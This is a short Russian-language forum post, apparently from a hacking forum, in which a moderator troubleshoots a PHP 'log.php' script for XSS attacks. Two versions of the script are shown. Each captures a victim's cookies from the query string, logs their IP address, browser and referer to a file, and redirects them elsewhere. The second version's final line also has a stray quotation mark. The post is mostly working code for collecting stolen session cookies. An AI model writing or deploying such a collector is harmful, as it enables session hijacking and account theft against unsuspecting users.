26.09.2009, 02:25
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155
Репутация:
719
|
|
Сообщение от Chrome~
Спасибо за приятные отзывы, очень рад был стараться.
Хром, с файлом log.php для xss у меня не заработал этот вариант
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING")); // Читаем переменную a из GET-запроса, в которой будут кукисы
$Date = date("d-m-y H:i:s", time()); // Дата и время
$browser = getenv("HTTP_USER_AGENT"); // Информация о браузере
$ref = getenv("HTTP_REFERER"); // Страница, с которой пришли
$ip = getenv("REMOTE_ADDR"); // IP адрес
// Записываем полученные данные
$text = "Date: $Date\nBrowser: $browser\nReferer: $ref\nIP: $ip\nQuery: $query\n\n";
$filelog = fopen("base.php","a+"); // Открываем файл базы
fwrite($filelog,"\n $text \n"); // Записываем
fclose($filelog); // Закрываем
header('Location: http://somesite.ru'); // Переводим жертву на указанный адрес
?>
а когда я убрал лишние команды в $text= то он заработал на отлично. В чем разница? 
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING"));
$Date = date("d-m-y H:i:s", time());
$browser = getenv("HTTP_USER_AGENT");
$ref = getenv("HTTP_REFERER");
$ip = getenv("REMOTE_ADDR");
$text = "
$Cookies:
$Date:
$browser:
$ref:
$ip:
$query";
$filelog = fopen("base.php","a+");
fwrite($filelog,"\n $text \n");
fclose($filelog);
header('Location: http://somesite.ru'');
?>
|
|
|